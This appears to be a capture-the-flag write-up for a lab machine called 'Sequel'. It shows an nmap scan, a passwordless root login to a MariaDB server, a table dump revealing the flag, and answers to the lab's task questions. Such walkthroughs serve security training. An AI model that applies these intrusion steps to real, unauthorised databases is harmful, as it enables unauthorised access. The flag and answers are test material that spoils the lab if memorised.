# Sequel

## Information Gathering

```
sudo nmap -sV -sC 10.129.75.127
[sudo] password for sean:
Starting Nmap 7.80 ( https://nmap.org ) at 2022-05-08 10:45 EDT
Nmap scan report for 10.129.75.127
Host is up (0.024s latency).
Not shown: 999 closed ports
PORT     STATE SERVICE VERSION
3306/tcp open  mysql?
| mysql-info:
|   Protocol: 10
|   Version: 5.5.5-10.3.27-MariaDB-0+deb10u1
|   Thread ID: 98
|   Capabilities flags: 63486
|   Some Capabilities: Support41Auth, SupportsCompression, InteractiveClient, SupportsTransactions, Speaks41ProtocolOld, IgnoreSigpipes, ConnectWithDatabase, FoundRows, LongColumnFlag, Speaks41ProtocolNew, IgnoreSpaceBeforeParenthesis, ODBCClient, SupportsLoadDataLocal, DontAllowDatabaseTableColumn, SupportsMultipleStatments, SupportsMultipleResults, SupportsAuthPlugins
|   Status: Autocommit
|   Salt: _VqT29i&~iu27[F-JonZ
|_  Auth Plugin Name: mysql_native_password

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 178.87 seconds
```

We installed `mysql-client` via `apt`. We were able to authenticate without a password with the username `root`.

```
$ mysql --host 10.129.75.127 --user root
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 103
Server version: 5.5.5-10.3.27-MariaDB-0+deb10u1 Debian 10

Copyright (c) 2000, 2022, Oracle and/or its affiliates.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql>
```

```
mysql> SHOW DATABASES;
+--------------------+
| Database           |
+--------------------+
| htb                |
| information_schema |
| mysql              |
| performance_schema |
+--------------------+
4 rows in set (0.02 sec)

mysql> use htb
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables
    -> ;
+---------------+
| Tables_in_htb |
+---------------+
| config        |
| users         |
+---------------+
2 rows in set (0.01 sec)

mysql> select * from config;
+----+-----------------------+----------------------------------+
| id | name                  | value                            |
+----+-----------------------+----------------------------------+
|  1 | timeout               | 60s                              |
|  2 | security              | default                          |
|  3 | auto_logon            | false                            |
|  4 | max_size              | 2M                               |
|  5 | flag                  | 7b4bec00d1a39e3dd4e021ec3d915da8 |
|  6 | enable_uploads        | false                            |
|  7 | authentication_method | radius                           |
+----+-----------------------+----------------------------------+
7 rows in set (0.01 sec)
```

The flag is: `7b4bec00d1a39e3dd4e021ec3d915da8`

## Tasks

1. What does the acronym SQL stand for?
    * structured query language
1. During our scan, which port running mysql do we find?
    * 3306
1. What community-developed MySQL version is the target running?
    * MariaDB
1. What switch do we need to use in order to specify a login username for the MySQL service?
    * `-u`
1. Which username allows us to log into MariaDB without providing a password?
    * root
1. What symbol can we use to specify within the query that we want to display everything inside a table?
    * `*`
1. What symbol do we need to end each query with?
    * `;`
